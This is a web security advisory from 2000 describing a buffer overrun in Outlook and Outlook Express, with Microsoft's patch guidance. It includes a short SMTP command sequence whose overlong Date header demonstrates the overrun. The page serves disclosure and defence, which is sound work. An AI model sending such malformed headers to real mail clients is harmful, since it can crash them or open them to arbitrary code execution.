Skip navigation
Menu
Security

Unchecked Buffer in Outlook May Run Arbitrary Code

 
Unchecked Buffer in Outlook May Run Arbitrary Code
Reported July 19 by USSRLabs

VERSIONS AFFECTED
Microsoft Outlook Express 4.0 - 5.01
  • Microsoft Outlook 97, 98, and 2000

    DESCRIPTION

    An unchecked buffer in Outlook may allow a malformed date parameter to run arbitrary code to execute on the system. The overrun occurs when a string is appended to the end of the Date parameter in the SMTP mail header as seen in the example below.

    DEMONSTRATION

    The following series of SMTP mail commands will initiate the buffer overrun when the user receives the email via an unpatched version of Outlook:

    HELO
    MAIL FROM: someone@somedomain
    RCPT TO: target@someotherdomain
    DATA
    Date: Thu,19 Jul 2000  11:11:00
    +1111111111111111111111111111111111111111111111111111111111111
    .
    QUIT

    USSRLabs has also made available a series of client-side tools that demonstrate the problem:

    VENDOR RESPONSE

    Microsoft issued FAQ# FQ00-043 regarding this problem along with a patch and Support Online article Q267884, which also pertain to security issues MS00-043 and MS00-046.

    Microsoft"s bulletin states that "this vulnerability can be eliminated by taking any of the following actions:

    • Installing the patch available at
      http://www.microsoft.com/windows/ie/download/critical/patch9.htm
    • Performing a default installation of Internet Explorer 5.01 Service Pack 1,
      http://www.microsoft.com/Windows/ie/download/ie501sp1.htm.
    • Performing a default installation of Internet Explorer 5.5
      (http://www.microsoft.com/windows/ie/download/ie55.htm)
      on any system except Windows 2000.

    Note: The patch requires IE 4.01 SP2 (http://www.microsoft.com/windows/ie/download/ie401sp2.htm) or IE 5.01 (http://www.microsoft.com/windows/ie/download/ie501.htm) to install. Customers who install this patch on versions other than these may receive a message reading "This update does not need to be installed on this system". This message is incorrect. More information is available in KB article Q267884"

    CREDIT
    Discovered by USSRLabs

    		•
    Hide comments

    More information about text formats

    Comments

    • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

    Plain text

    • No HTML tags allowed.
    • Web page addresses and e-mail addresses turn into links automatically.
    • Lines and paragraphs break automatically.
    Publish
    Recommended Reading
    DevSecOps concept
    90% of Java Services in Production Have Vulnerability Risk, DevSecOps Report Finds
    Apr 20, 2024
    Businesswoman challenges concept and gender obstacles
    Women in Cybersecurity Face Barriers to Hiring, Advancement
    Apr 15, 2024
    person typing on keyboard with icons for certificates
    Top IT Certifications for a Career in Finance
    Apr 12, 2024
    employee working on a laptop with AI
    Why AI Coding Assistants May Be Greatest Cybersecurity Threat Facing Your Business
    Mar 26, 2024